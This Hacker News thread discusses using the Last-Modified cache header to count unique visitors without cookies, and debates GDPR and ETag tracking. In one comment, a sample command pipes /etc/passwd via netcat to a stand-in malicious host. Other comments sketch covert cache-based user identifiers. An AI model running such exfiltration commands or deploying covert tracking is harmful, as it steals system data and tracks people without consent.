[HN Gopher] Using a date-modified header to detect unique visito...
___________________________________________________________________
Using a date-modified header to detect unique visitors without
using cookies
Author : mulhoon
Score : 306 points
Date : 2022-11-30 16:04 UTC (6 hours ago)
(HTM) web link (notes.normally.com)
(TXT) w3m dump (notes.normally.com)
| [deleted]
| a_c wrote:
| Looks like a nice middle ground between no tracking at all and
| needing all tracking to how well your website perform. Seems no
| fingerprinting is involved so the website visitor is anonymized.
| Unlike cookies where we can store whatever we like, this method
| reveal only the unique visit, and its derivatives.
| alkonaut wrote:
| I very much prefer this to e.g fingerprinting. This is local to
| one site and basically uniqueness only rather than an identifying
| id. I don't feel "tracked" or "targeted" by this.
| schoen wrote:
| Martin Pool discovered pretty much this technique back in 2000:
|
| https://catless.ncl.ac.uk/Risks/20.86.html#subj10.1
| kiriberty wrote:
| Cringe moment, this is abusing the feature where last-modified
| was created for
| someweirdperson wrote:
| "Counting unique visitors"?
|
| They are counting repeated requests. The unique count then is
| "total requests" minus "repeated requests".
|
| Wouldn't it be easiser to count the number of times a cached
| resource is accessed?
| BeefWellington wrote:
| Time of last access + a counter of your visits once your hits
| reach N>2 is probably enough to separate an individual from the
| crowd here, unless your site is tremendously busy.
| jahewson wrote:
| The fact that this is being used in an analytics product that
| claims to be compliant with all privacy laws is horrifying.
| There's no way this is compliant _and_ it's deceptive.
| andix wrote:
| I agree. Well crafted laws (like the GDPR) forbid any kind of
| tracking without consent. It's the what and not the how. It
| doesn't matter if it's via cookies or any other way.
| pyrolistical wrote:
| Please explain why this isn't compliant?
| erdos4d wrote:
| This is a form of data collection and tracking that is
| definitely against GDPR unless the user is informed of it and
| consents to it. As it stands, there is no such notification
| or consent. IANAL but I strongly suspect will get you fined
| in the EU.
| pyrolistical wrote:
| What personal information is being collected here?
| erdos4d wrote:
| GDPR doesn't just cover personal info, it also forbids
| tracking without consent, which includes cookies and
| other means. This is just a technical trick to track
| someone sans cookie, so I'm 100% certain they will fine
| anyone doing it unless they get consent.
| whartung wrote:
| Arguably this can become personally identifiable, much like a
| persons height of 7 feet becomes personally identifiable. How
| many 7 foot people live in Elko Nevada? (I have no idea,
| perhaps there's an entire colony of them.) But most very tall
| people, well, stand out. "You're that tall guy from Elko!"
|
| Early on, it's not personally identifiable. No doubt there
| can be a lot of folks visiting the site only 10 times and
| never again.
|
| But as someone continues to visit, they begin to narrow down
| who they are to "You're that guy that comes in here every day
| with a yellow hat". They may not "know" who you are but, they
| "know" who you are.
|
| Eventually, there may be that one person that has the highest
| hit rate, who always stands out.
| jefftk wrote:
| _> there may be that one person that has the highest hit
| rate, who always stands out._
|
| They could stop incrementing once they get to 10 (or
| something that's high but common enough to be shared by
| 1,000s of people).
| Spivak wrote:
| > You're that guy that comes in here every day with a
| yellow hat
|
| Yes but you have absolutely nothing at all to associate
| that back to a person. Where are you going to find the data
| "personal information of some kind of the people who visit
| your site a lot?" You're not collecting it.
| bpfrh wrote:
| Because the GDPR isn't about any specific technology, but
| concerns any processing of personal data:
|
| https://gdpr.eu/what-is-gdpr/
|
| Edit: Huh, I stand corrected I don't know if this would count
| as personal data.
| eurasiantiger wrote:
| Storing a cache header is not an issue, but if it is used
| as a unique identifier for user analytics purposes, it is
| almost certainly personally identifying information, at
| least after combining with other data. Since they are not
| disclosing that they store something they use to ID users,
| it is likely a GDPR violation, at least in spirit, and that
| spirit is exactly what GDPR seeks to control.
| bonestamp2 wrote:
| > after combining with other data
|
| The post says that they don't combine datapoints because
| that would negate privacy.
| eurasiantiger wrote:
| _They_ don't but anyone using their service could.
| ATsch wrote:
| It is personal data regardless of how it is used. The
| only question is if that use of personal data is
| permissive.
|
| Using it for user analytics, which is neither required to
| run the service, nor in the users interest, nor
| reasonably expected by the user, is almost definitly
| illegitimate use.
| jahewson wrote:
| See my reply to b34r. In addition assigning users into
| "anonymous" cohorts is a similar principle to FLoC which is
| likely not GDPR compliant
| https://searchengineland.com/googles-current-floc-tests-
| aren...
| tobr wrote:
| That seems very different, as those cohorts are based on
| actual personal data (correct me if I've misunderstood this
| about FLoC). That's fundamentally different from a counter
| I think.
| jahewson wrote:
| Yes that's right, FLoC is explicitly using personal data.
| But now consider that that data is "you visited a
| gardening website in the past month" and compare it with
| "you visited this website 3 times yesterday" and the two
| methods don't look so different.
| tobr wrote:
| I guess we all have different instincts when it comes to
| this, but I find it much more expected and acceptable
| that a website can see that I'm returning, than that they
| get to know about random other interests I have based on
| my general browsing history.
| dahfizz wrote:
| > Processing personal data to generate the cohort
| assignment without the proper consent could also be a
| violation
|
| Using personal data to assign a cohort counts as using
| personal data. Duh. The approach described in the article
| doesn't use any personal data, though?
| eganist wrote:
| > Using personal data to assign a cohort counts as using
| personal data. Duh. The approach described in the article
| doesn't use any personal data, though?
|
| Quoting the European commission:
|
| "Personal data is any information that relates to an
| identified or identifiable living individual. Different
| pieces of information, which collected together can lead
| to the identification of a particular person, also
| constitute personal data."
|
| I'd hazard a guess that it's the second part under which
| the EC might find this to be within scope.
| dahfizz wrote:
| If I gave you a list of all the last-modified headers
| from a day, how would you use that information to
| identify a person?
| ATsch wrote:
| The definition of personal data under the GDPR is
| anything that can be used to uniquely identify a natural
| person (with sufficiently high probability). Both cookies
| and date-modified meet that definition identically, as do
| IP addresses.
|
| That doesn't mean you can't use it at all. It just places
| strong restrictions on what purpodes you can use it for.
| The important point is just that those restrictions are
| the same under GDPR for all of these technologies. It
| doesn't matter how you uniquely identify users, what
| matters is what you do with that information.
| dahfizz wrote:
| They don't assign a unique date-modified to each user.
| They assign _everyone_ the _same_ date modified on their
| first visit of the day. I don 't accept that this could
| be used to uniquely identify a natural person.
|
| You may be able to look at the headers and see that a
| certain user made the most requests that day. That still
| tells you nothing about their identity.
| mytailorisrich wrote:
| Nothing in the technique described here allows to
| identify an individual directly or indirectly because
| 'identifiers' are not unique and really no different than
| standard 'last-modified' dates. Even if they were unique
| further data would have to be collected in order to be
| able to identify individuals and turn everything into
| personal data.
|
| What the technique may fall foul of, though, are cookie
| laws.
| Spivak wrote:
| You can't just scare quotes anonymous without explaining
| how it could deanonymize you. You're sitting there with
| full access to the count data they collect. Use any
| statistical methods you like, figure out what visits were
| me.
| mytailorisrich wrote:
| The article you quote does not suggest that "assigning
| users into "anonymous" cohorts is ... is likely not GDPR
| compliant" and I fail to see how that would be the case.
| Rather it seems to mention concerns that _processing
| personal data_ to do so may be problematic.
| b34r wrote:
| Why? It's anonymous and doesn't collect any user data other
| than IP and stuff from the user agent
| jahewson wrote:
| It's not anonymous in a low-entropy situation. A user can be
| indirectly identified. This would violate GDPR.
| CaveTech wrote:
| No it wouldn't.
| jahewson wrote:
| Yes it would because a unique time stamp allows me to
| indirectly identify a user.
| SparkyMcUnicorn wrote:
| How?
| kapep wrote:
| It is not a unique timestamp though. Each day, all
| visitors start at 00:00:00. All users that visit the site
| a second time get the timestamp 00:00:01 and so on.
| CaveTech wrote:
| Where are people getting these insane reads of GDPR. Any
| bit of entropy is not going to violate GDPR. First, an
| active client-server connection is required for any kind
| supposed "identity" contained here, which would of course
| include far more unique bits of identity/entropy, such as
| IP. Secondly, even if the full DB of page view counts
| were leaked you could not actually use it to identify a
| user.
|
| You have somehow perverted GDPR to believe it to mean `no
| client may ever hold a unique state`. Good luck to anyone
| making a claim that this is NOT possible in anything but
| the most rudimentary application.
| pyrolistical wrote:
| I don't see how it can be used as described to identify an
| individual person.
|
| Multiple requests end up with the same time stamp which
| means individuals are not traceable but as an aggregate
| countable
| jahewson wrote:
| Only multiple requests within a given second get the same
| time stamp. So if you have less than 86k hits per day,
| then all your time stamps could be unique.
|
| Edit: I misread the article here, where it said each
| visit incremented the counter by one second. So my
| calculation is not correct!
| bradstewart wrote:
| But how do I then tie that unique timestamp to an actual
| _person_? Which is what GDPR is concerned about.
|
| (edit: spelling)
| dahfizz wrote:
| How do you go from timestamp to identifying someone?
|
| ~Every HTTP response has a Date field with a second-
| resolution timestamp that might be unique. Are you
| equally concerned about that?
| TylerE wrote:
| Birthday paradox means that will be far lower.
| Thorrez wrote:
| No, they are truncating the timestamp to the day. So all
| visitors to the site on a specific day get the same
| initial timestamp.
| jahewson wrote:
| Ah so they are, thanks! That's much better. Though for a
| very, very low-traffic site this would still let me track
| unique visitors.
| genewitch wrote:
| It is designed to track unique visitors, but not
| differentiate between them at all.
|
| both you and i visit the same new site today, we both get
| a file our browser caches with today's date at 00:00:01.
| Tomorrow when we go to the same site, our browser says we
| got the file yesterday, so the server sends a new
| modified date to the browser, set to tomorrow's date at
| 00:00:02. Both of us have the same "new" file with the
| new modification date/time.
|
| if i go back the following day, the only thing the server
| knows for certain, from just this header, is that i've
| visited twice before. So i'm not counted as a unique
| visitor.
|
| That this could be used by assigning a _unique_ timestamp
| to each visitor is where everyone 's mind is going, and
| it feels like half are annoyed there's another way to
| leak information, and the other half are annoyed they
| didn't think of it prior to the end-of-year marketing
| bonus deadline.
| [deleted]
| prpl wrote:
| Do people use etag for such purposes?
| cpeterso wrote:
| Yes. ETag tracking has been a thing for decades:
|
| https://en.wikipedia.org/wiki/HTTP_ETag#Tracking_using_ETags
| habibur wrote:
| This can be used like a cookie without using cookies as long as
| definition of cookie stays "...a cookie is a small file stored on
| your computer".
|
| You have 30 million seconds per year as unique identifier to be
| used against each individual for tracking. Even though the OP
| didn't do it.
|
| Put an expire time in between 10 years back to today and 300m
| users tracked.
| superjan wrote:
| On the other hand, now that we know about it is easy to defeat:
| a privacy conscious browser will just add a random amount of
| minutes/seconds in the "if modified since" header. The only
| risk is you sometimes trigger a reload because the resource was
| modified in that interval.
| Kuinox wrote:
| It's harder, but you still leak bits of informations. If the
| random function is known, statical analysis can still leak
| out a bit of information.
| [deleted]
| legitster wrote:
| Am I missing something? Abusing the cache meta-data to store data
| on the user device seems much worse than a cookie.
|
| I would have serious doubts of the longevity of such a trick, let
| alone some of the technical limitations I am sure the service
| has.
| bonestamp2 wrote:
| The missing piece is that no fingerprint is involved. They
| don't have a way of identifying that user, but they are still
| able to count the number of times that visitor loads the page.
| So, it's not a tracker, it's a counter. It's like a loyalty
| punch card at your local sandwich shop -- they can track how
| many times you've been there by counting the hole punches, but
| they don't have a unique identifier, so they can't track
| details about those visits.
|
| On the other hand, a cookie or a browser fingerprint contains
| info that can uniquely identify that user so it can be used for
| tracking.
| legitster wrote:
| A cookie doesn't _have_ to contain a fingerprint though.
|
| In the same way, nothing in their current method necessarily
| says they couldn't find a way to insert a fingerprint here.
| bonestamp2 wrote:
| Fair enough. At least they've told us how it works, so if
| the data no longer matches that methodology in the future
| then we can speculate that they've implanted a UID, unless
| they tell us how it works again and the data is consistent
| with the new methodology.
| o_m wrote:
| Cookie tracking without consent is illegal in Europe, so it is
| a clever way to still do some basic web analytics.
| roelschroeven wrote:
| Tracking without consent is illegal in Europe, _regardless of
| the method_. Alternative tracking methods are not workarounds
| to get around the law; they are only workarounds in trying
| not to be caught.
| atoav wrote:
| Yeah nice try. Law makers are not _that_ stupid. _Any_ way of
| storing personal data is subject to this regulation.
|
| And before you try the next thing, personal data is
| everything that can be linked to a specific user, e.g. IP
| addresses have been ruled to be personal data, some uuid that
| helps you identify a user as well.
|
| People should really read the law, and/or at least literate
| commentary on it instead of assuming things or repeating what
| someone else assumed.
| mytailorisrich wrote:
| This is definitely not personal data. The piece of
| information is not linked to an individual and cannot be
| used to identify an individual (not the same as a 'user'),
| not least because it is not unique to each visitor:
| According to the article all first requests get the same
| 'last-modified' date, same for all second requests, etc.
|
| Still, this stores data in the browser in a way that might
| be deemed a technology similar to a cookie, and therefore
| this might still fall within the various cookie laws, but
| this is completely outside of personal data regs.
| masklinn wrote:
| Tracking without consent is illegal. This is a clever way to
| get absolutely reamed, because you're not only in breach of
| data protection laws you're actively trying to obfuscate it.
| andix wrote:
| The obfuscation part is probably irrelevant from a legal
| perspective.
| baggy_trough wrote:
| This article is written like it's a great privacy breakthrough
| but why is this any different from dropping a user id cookie?
| jamincan wrote:
| User's might block cookies, but this will likely still go
| through.
| jagged-chisel wrote:
| How do you get more than 86,400 unique "identifiers" when they
| only change every second?
| marshray wrote:
| A malicious site can put a different identifier on every
| resource loaded by the browser.
|
| There really is no bottom, is there.
| koliber wrote:
| There are also many timezones and you can encode information
| in the timezone indicator as well. Also, you can use
| different days. You can stretch this number into millions.
| For a website that gets a certain number of unique visitors
| per year, this may be unique enough.
| tedunangst wrote:
| Subdomains. (Not sure why I immediately thought subdomains
| and not just multiple resources.)
| toast0 wrote:
| who says Last-Modified has to be a current date? you've got
| the potential for 1669827111 users as of when I was composing
| this comment without giving your users future dates.
| WirelessGigabit wrote:
| You don't have to. A unique visitor is someone who comes in
| without a last-modified header. Set the header, that person
| is no longer unique.
| nine_k wrote:
| It is materially different because it does not track individual
| users.
|
| It's comparable to dropping the same cookie to every visitor on
| a particular day; a pretty low level of privacy invasion.
|
| Also, this allows to _not_ use such things as visitor 's IP
| address to collect meaningful statistics, which is a privacy
| win for the user, and an accuracy win for the site operator.
| kevincox wrote:
| Exactly this. It is different from dropping a user id cookie,
| but equivalent to dropping a cookie hit_count=0, hit_count=1,
| ...
| baggy_trough wrote:
| Seems like the hit_count cookie would be a lot more
| straightforward.
| ChoHag wrote:
| politelemon wrote:
| If the counter is empty for you, disable your adblocker
| temporarily. The withcabin.com domain might be blocked.
| dahfizz wrote:
| Threads like this kinda make me sad about HN. Every single
| comment is about how this technique might possibly be abused to
| track users in very specific scenarios (i.e. you may be able to
| identify your most active user).
|
| If a web server wanted to track you, they would just use your IP.
| This is a clever technical trick to count your number of users
| without collecting any personal data. I don't understand why that
| is such a bad thing?
| zackmorris wrote:
| I think this cache date trick is clever!
|
| There are at least three fallacies with stuff like GDPR that
| trigger anxiety in people by convincing them that they can
| somehow safeguard their own privacy while surfing hundreds of
| websites per day, many in other countries. I'm not going to
| fully discredit them, just give counterexamples:
|
| 1) The internet can continue to work without tracking users
|
| - Targeted advertising (can't have both, although I can't say
| that I'll miss ads)
|
| 2) Users care that companies have their personally identifiable
| information (PII)
|
| - Users care how companies share and abuse their data for
| profit (they already know they're being tracked if they don't
| use something like TorBrowser)
|
| 3) Privacy protections actually result in privacy
|
| - PRISM and similar will always find you:
| https://en.wikipedia.org/wiki/List_of_government_mass_survei...
|
| So I view all of this security theater with utter skepticism. I
| think the only thing that can maybe save us is transparency.
| Letting users download their data and using the threat of audit
| to keep internet companies honest:
|
| https://securiti.ai/blog/dsar-rights-and-compliance/
|
| The rest of the squabbling about "no that's PII, you can't save
| that!" has only resulted in endless nagging and distraction.
| It's like trying to hide your address from the post office or
| thinking that your phone number is secret because it's not in
| the phonebook.
|
| Although I do think it's kind of funny to make big companies
| feel like they're living under a police state. They'll work
| tirelessly to undermine these protections, which is why we'll
| eventually abandon them like we did with prohibition and
| McCarthyism because they just aren't enforceable when everyone
| is breaking the law. Or (equally likely) they'll work to
| bolster these laws to create new markets through power
| imbalance, ensuring that only the largest companies can meet
| compliance and smaller companies pay some sort of protection
| money against the threat of litigation, which opens the door to
| mass corruption. Both of these scenarios are ugly enough that I
| think this entire rabbit hole is suspect.
| Sohcahtoa82 wrote:
| > If a web server wanted to track you, they would just use your
| IP.
|
| I'd think a HN user would know that using an IP to track isn't
| effective.
|
| For most home desktop users, at best, it tracks an individual
| household, not a person. For corporate users and highly
| privacy-conscious home users, it's probably completely
| worthless as VPNs will make everyone come from a single IP.
|
| For mobile users, it's completely worthless. You'd be tracking
| users of a specific WiFi network. If your phone is connecting
| via IPv4, then who knows who you're tracking, as phones on a
| mobile network will share an IP address.
| ketralnis wrote:
| And if you think VPN users are too obscure a use case to
| account for, a specific case I've dealt with is (1) all of
| AOL coming from one IP in Virginia (yes this was a while ago)
| and (2) almost every university appearing as a single IP (on
| a website frequented by university students)
| jgalt212 wrote:
| As recently as 2006, an entire country was behind a VPN
| using a single public IP address. If lore can be
| believed...
|
| https://superuser.com/questions/1013630/why-does-qatar-
| use-a...
| kccqzy wrote:
| Universities do that now? When I was in college, if one
| connects to the visitor network they'd give you a RFC1918
| address with NAT and a restrictive firewall, but if one
| connects to the regular network and authenticates as a
| student, they give you a publicly routable IP address.
| jesprenj wrote:
| Depends on a lot of factory. The primary school I was a
| student at had public IPs at every computer, our national
| academic and research network operators are encouraging
| local network operators to avoid private IPs. But the
| high school at which I'm currently a student, has private
| IP addresses on every computer and a single external IPv4
| for the entire facility. It's not so one sided.
| lazide wrote:
| Many will also push http/https proxies regardless of IP
| addressing schemes, so even if one user bypasses it,
| anyone using defaults will come from whatever the
| external proxy IP is.
| ketralnis wrote:
| I went to a community college that did transparent HTTP
| proxying with not just deep packet inspection but caching
| and "security"-oriented javascript injection. Headers
| would get reordered, and its parser wasn't perfect so
| multi-line headers would get broken sometimes. They'd
| inject JS into pages to scan for... something? Other
| injected JS? I have no idea. But it was impossible to
| directly connect to another server without going through
| their proxy even though from the TCP layer it looked like
| you were. Lots of difficult to debug issues.
| lazide wrote:
| Wow, that's impressively evil. Right up there with the
| old 'rewrite DNS traffic' trick from ISPs.
|
| Any idea what make/model the proxy was?
| mike_d wrote:
| At a previous job we tracked unique visitors to prevent ad
| fraud. You'd find not only individual IPs with thousands of
| users behind them, but also larger populations of users
| numbering in the tens of thousands behind a small block of
| 8-16 IPs.
|
| The craziest was a large multinational corporation that (I
| guess for security?) changed their egress IP daily. The
| first three octets remained the same and the fourth was
| equal to the day of the month UTC. Really screws things up
| when you use a 14 day rolling window of previous traffic
| for comparisons.
| bawolff wrote:
| I mean, i expect most people who use a vpn to also use
| incognito mode as well, which i assume would prevent this
| type of tracking.
| [deleted]
| IshKebab wrote:
| It's not a clever technical trick. It's a pointless technical
| trick.
|
| You can do exactly the same thing with cookies and they are
| better for privacy because there's an opt out mechanism.
| They're how you're _supposed_ to do this sort of thing.
|
| Using a trick like this is no different to cookies in the eyes
| of the GDPR. So the only reason to use this trick is if you
| don't want to respect your users' privacy by being able to
| block cookies.
| EGreg wrote:
| I mean, if people wanted to track visitors without cookies,
| they'd just use etags...
|
| https://www.secjuice.com/etag-entity-tag-tracking/
|
| Has Apple's ITP closed this particular loophole by ignoring
| etags in third party iframes and capping them to 7 days etc. ?
|
| It seems browsers will want to restrict ALL first party cookies
| to 7 days unless the visitor explicitly allows some domain to
| store their identity.
|
| Frankly speaking, identity can be done better without cookies.
| Look at Web3 sign-ins, we need something built into the browser
| and seamless. For now maybe an extension. Then browser makers
| can have a privacy mode that retires cookies, entirely.
|
| But how are you supposed to do caching without storing and
| sending identifying data equivalent to cookies?
|
| Thoughts?
| fanso99 wrote:
| My understanding is that most commenters are less critical of
| this specific implementation, but are alarmed by how this new
| technique could be used by other more nefarious parties in the
| future.
|
| Counting visits is probably still not a fully GDPR-complaint
| use case, as the server stores data on the client's machine
| which is indistinguishable from a cookie containing a counter.
| tinus_hn wrote:
| First, an IP address is considered personal data in the EU.
|
| Second, an IP address is not enough, it may change or be
| shared. The advertisers 'need' to track you forever to serve
| you relevant ads. So they devise all kinds of tricks to do so.
| aardvarkr wrote:
| > First, an IP address is considered personal data in the EU.
|
| I don't believe that's true. To my knowledge, GDPR only
| treats IP address as personal data if it is associated with
| actual identifying information (like name or address).
| Collecting IP address alone, and not associating it with
| anything else, is completely fine (otherwise nginx and
| apache's default configs would violate GDPR), and through
| them basically every website would violate GDPR.
| fanso99 wrote:
| Collecting IP addresses and linking them to a user ID is
| considered PII as far as I know.
| EGreg wrote:
| So the idea is that you can't legally collect information
| in private that you can technically collect.
|
| As long as a company is able to keep it a secret, they
| won't get caught.
|
| Witness the hundreds of violations of public trust by
| Facebook:
|
| https://www.independent.co.uk/tech/facebook-app-
| recording-ca...
|
| The only complete solution is technological!
| mytailorisrich wrote:
| That's correct. IP addresses are not personal data in
| themselves but they may become so if further data are
| collected or accessible which allow to identify individuals
| when used together with IP addresses.
| rzzzt wrote:
| CGNAT complicates matters even further. Sometimes I'm placed
| way off within <country> if a site tries to go by GeoIP
| databases, as the provider placed a bunch of households
| behind a single address.
| JohnFen wrote:
| After decades of straight-up abuse by this sector of the
| industry, including the subversion of countless "privacy
| respecting" data collection techniques, I think an
| extraordinary amount of skepticism and suspicion is more than
| understandable.
| kccqzy wrote:
| Why would you put privacy respecting in quotes? The
| subversion of those techniques are probably just because
| those techniques are so new and people haven't had better
| technologies yet.
|
| I personally consider those privacy respecting data
| collection techniques as a parallel with the development and
| use of cryptography on the web. In the beginning pretty much
| no one online used cryptography; later on we started using
| them but used weak ones ("export" cipher suites for example,
| or just look at the issues in early protocols like SSL 2.0 or
| SSL 3.0); nowadays almost everyone uses strong cryptography.
| Similarly, in the beginning pretty much no one cared about
| privacy when they did data collection; then we had begun to
| care more about privacy, but many schemes are easily broken
| due to for example misguided ideas of anonymization
| ("anonymization by hashing"), and we are also starting to see
| the development of newer private information retrieval
| schemes and differential privacy, etc. Unlike the cynics on
| this HN thread, I am quite confident that maybe a decade down
| the road the majority of data collection done by companies
| will be in a privacy preserving manner. Of course there will
| be outliers much like there are still websites that don't use
| https but those will be few and far between.
| JohnFen wrote:
| I quoted the term not with the intention of disparaging the
| notion, but to indicate that I'm referring to a specific
| class of approaches. That said, the term has also been
| abused to the point where when it's used, I immediately
| doubt that it's accurate.
| mozman wrote:
| Fingerprinting using WebRTC is far more effective. IPs are
| useless.
| nottorp wrote:
| We tend to object to people considering it normal to track us.
| Regardless of means.
| dahfizz wrote:
| This is not tracking. Could you explain why you think it is?
| fanso99 wrote:
| Storing a cookie with a counter still requires consent
| afaik. If I am right, then this technique is not
| sufficiently different and also requires consent.
| robertlagrant wrote:
| Why would that require consent?
| chriswarbo wrote:
| Consent is _always_ required; even if you just give
| people a random UUID, with no associated session /etc.,
| that _always_ requires consent.
|
| There is a separate question, of whether consent is
| implied. If the identifying information is required to
| provide the user with a service they requested (e.g. a
| cookie for their online shopping cart), then consent is
| implied; no need to ask.
| nottorp wrote:
| Could you explain why i should care, considering the
| current climate online?
|
| When you try to cram a list of 500 "legitimate interests"
| down my throat, I will consider no interest as legitimate.
|
| No matter what your goals are, you're in an industry that
| has zero trust these days.
| dahfizz wrote:
| Without viable alternatives, sites will continue to use
| Google Analytics. If people like you fear-monger every
| alternative, sites will continue to use Google Analytics.
|
| The method described in the article collects no personal
| data, collects no identifiable data, and is objectively
| more user-respecting than Google Analytics. But the
| behavior by people like you will help make sure that
| these alternatives don't gain traction and Google
| maintains their monopoly.
| EGreg wrote:
| Not only that. The ability to track your own visitors is
| BUILT INTO how the web operates.
|
| All a site has to do is include analytics in its server-
| side library. And that's it. Doesnt even need CNAME
| cloaking. It can send the analytics anywhere.
|
| The thing ITP and others try to stop is tracking users
| ACROSS sites.
|
| But if you use single-sign-on with FB or any other
| service, they can get your public photo, name and just
| find you on faceboon thru some search engine that
| spidered all profiles.
|
| So if you really want to be anonymous, stop using the
| single sign on and reusing passwords etc.
| ohbtvz wrote:
| But google analytics isn't viable. It's illegal to use in
| the EU. Here's an explanation by, well, a viable
| alternative to google analytics:
| https://matomo.org/blog/2022/05/google-analytics-4-gdpr/
|
| (I don't have a horse in this battle - my personal
| website doesn't have analytics at all.)
| stalfosknight wrote:
| How about we just _stop_ tracking users and hoovering up
| private data?
| xapata wrote:
| Who's "we"? I don't mind it. I want advertisers to give me
| more relevant advertising.
| mschuster91 wrote:
| I don't want _any_ unsolicited advertising - and I wish our
| societies would decide to outright _ban_ advertising:
| Outdoor advertising is a nuisance for the eyes, radio and
| TV advertising is annoying AF (particularly as it tends to
| be mixed at a much greater loudness than the program
| running, my conspiracy theory is that this is done so
| people are forced to hear it when they go to the loo),
| paper advertising (e.g. in newspapers, flyers or postal
| spam) is a waste of paper and online advertising is an
| insane danger for privacy and a vector for distribution of
| malware.
|
| Ideally, we'd have independent consumer protection
| entities, either government or private (e.g. German
| Stiftung Warentest), that would get products from companies
| to rank and test, so consumers could make actually informed
| decisions instead of being lured by hyped up advertising
| claims.
| dspillett wrote:
| Depends how you define relevant. Since actively trying to
| block stalky advertising behaviours I've had more
| interesting adverts (by "interesting" I mean new-to-me, not
| the "do you want another one of the thing you've already
| bought all you need of for a while" types). Things are
| relevant enough if, for instance, I get running related
| adverts while reading an article about other runners or
| browsing shoes.
|
| In my experience the stalky behaviour doesn't improve the
| advertising relevance from my PoV, so the fact it means
| that all that derived information, some of it definitely
| PII, is out there so should anyone be able to hack into it
| they could use it for fraudulent purposes (identity theft,
| spear-fishing my contacts, ...), makes the situation lose-
| lose for me.
|
| It is worse for other people, as they have information that
| advertisers like to derive that might be extra sensitive.
| Being white, male, cis, middle-class, ete, with a life not
| interesting enough for there to be much to convincingly
| blackmail or threaten me about, living in western Europe,
| I'm pretty safe, but this can't be said for others
| especially in certain parts of the world (scarily religious
| ruled countries with bad records on individual rights, like
| Qatar and America to give two examples).
| xapata wrote:
| I think you're conflating two different kinds of
| surveillance. The article is incrementing a counter to
| track the number of unique visitors.
|
| If one is worried about blackmail or violence, especially
| from a government, then one should take precautions
| beyond complaining about the prevalence of browser
| cookies. Modern life, carrying a mobile internet device
| with GPS service, using a credit card, and going to
| places with security cameras, presents a variety of
| surveillance methods.
| throwaway0x7E6 wrote:
| we the normal people
| lolinder wrote:
| Counting is not the same as tracking. The technique proposed
| would in most cases be useless for trying to _distinguish_
| individuals, much less identify them. It 's the computer
| equivalent of the person standing out in front of Costco with
| a clicker counter.
| MereInterest wrote:
| In principle, screen resolution would in most cases be
| useless for trying to distinguish individuals. After all,
| it wouldn't even distinguish the underlying hardware, let
| alone a user of that hardware. But given omnipresent
| tracking, it's one more bit that can be used to identify
| you.
|
| In addition, your comment shows a severe lack of
| imagination. Suppose I'm a malicious server who wishes to
| track users.
|
| * For each new user, select a random "late-modified" date.
| Now, I can clearly distinguish between multiple different
| users, because "1985-01-01T00:00:10" is probably the 10th
| visit from whoever was given "1985-01-01T00:00:00" on their
| first visit.
|
| * If I have too many users for the above approach to
| uniquely identify a person, add more cached items. With
| HTTP/2, both HTTP requests would use the same TCP
| connection, so I can correlate the requests together.
|
| And, bam. That goes from "useless for trying to distinguish
| individuals, much less identify them" to a unique
| identifier stored in the cache invalidation dates.
| lolinder wrote:
| That is a different technique that uses the same medium
| of storage. When I say "this technique" I'm referring to
| specifically what was discussed in the article.
|
| "Evil tracking companies will do evil things with any
| protocol features you give them" is already well known
| and there's not much to say about it that hasn't been
| said. What OP is _actually_ doing is clever and new to
| me.
| MereInterest wrote:
| I agree that it is clever, and it is new to me as well.
| However, saying that an obvious extension to a technique
| (posted by multiple people independently, no less) is a
| different technique altogether and therefore not germane
| is going a bit far.
|
| If I post a privilege escalation exploit that allows me
| to execute "cat /etc/sudoers", and somebody points out
| that it could also be used to execute "cat /etc/passwd |
| netcat malicious-remote-server.com", that's an obvious
| extension of the same technique. This is the same, where
| the same technique may be used for more intrusive attacks
| than are performed in the initial proof of concept.
| lolinder wrote:
| This kind of attack isn't new, though, trackers have been
| using side channel tracking forever now. A quick search
| shows that this _exact_ side channel tracking
| vulnerability was discussed in the year 2000 [0].
|
| I'm not saying the technique isn't similar: I just object
| to people dogpiling on OP because _other_ people can and
| do abuse the same header in nefarious ways. It 's not
| constructive, just a pointless attack on someone who's
| actually trying to improve privacy.
|
| [0] http://www.sourcefrog.net/projects/meantime
| ilyt wrote:
| Kinda need one for the other if you want to distinguish
| different users vs just one user clicking a lot.
|
| You need some kind of identifier to differentiate between
| different sessions, and the moment you generate that ID,
| using whatever way, you are tracking user.
| bawolff wrote:
| Why would it be useless? Just pick a random date for each
| user.
| lolinder wrote:
| I'm not talking about what you could theoretically do
| with cache headers, I'm talking about what the author of
| the article is actually doing.
| bawolff wrote:
| Its not like that is a far walk though. Its the exact
| same technique, just storing different data.
|
| Respectfully i feel like this would be like seeing an
| example of css turning a page blue and claiming the
| technique is useless for turning the page red because
| that is not the specific example used.
| lolinder wrote:
| If a bunch of people got up in arms and started
| complaining because the author of said CSS example hadn't
| considered that their code could be changed slightly to
| produce a hate symbol, I'd definitely still jump in and
| say "but that's not what they were doing!"
| SkyBelow wrote:
| Counting is not tracking, but counting unique visitors
| requires tracking to know they are unique. If the person
| outside of Costco is counting unique visitors, they must be
| tracking who has already visited and who has not. Even if
| they aren't doing anything else with that information and
| forgetting it each night, it is tracking. The existing
| abuse of tracking has led to a level of backlash where any
| tracking is seen through the worst possible lens.
| jcuenod wrote:
| It doesn't require tracking. Tracking would mean I could
| tell that user x has returned n times. But I have no idea
| who has returned, only that someone has returned n times.
|
| The person standing outside Costco is counting people by
| giving them a colored sticker when they walk through the
| door. If they show up already having one, the counter
| issues a different color. Who has the stickers is
| unknown; only the number of stickers distributed in each
| color is known.
|
| As has been said, this is not to say the technique
| couldn't be used for nefarious purposes. In this case,
| it's not, though.
| SkyBelow wrote:
| That's still a form of tracking. Maybe not enough to
| identify unique users in some use cases, but even just
| knowing someone has been here n times is enough if the
| user numbers are low enough that you can identify users
| by unique n counts and patterns of n (such as if one user
| is at 500 and another is at 490, if the second one is
| logging in daily while the first one hasn't logged in for
| a few months, and you see the 490 go 491, 492... when
| they go from 499 to 500, the chance when a 500 logs on
| tomorrow and becomes 501 it was the 490 account that has
| been logging in daily).
| jcuenod wrote:
| Must admit, I've never thought of "number of times I've
| visited your site" as PII. Number of times I've visited
| every site in my browser history, maybe, but not "number
| of times I've visited this specific site". I'm thinking
| about it, but I'm not immediately convinced.
| [deleted]
| layer8 wrote:
| If this becomes widespread, browers will probably start fudging
| the timestamps.
| glenjamin wrote:
| I think the comments on this post would probably less hostile if
| the title said something like "detect the number of unique
| visitors", which is what I believe it's doing, rather than
| detecting unique visitors using unique timestamps, which is what
| many seem to be guessing based on the headline alone.
| andix wrote:
| It would be interesting if it is also possible to abuse it. If
| it is possible to create enough unique timestamps, that
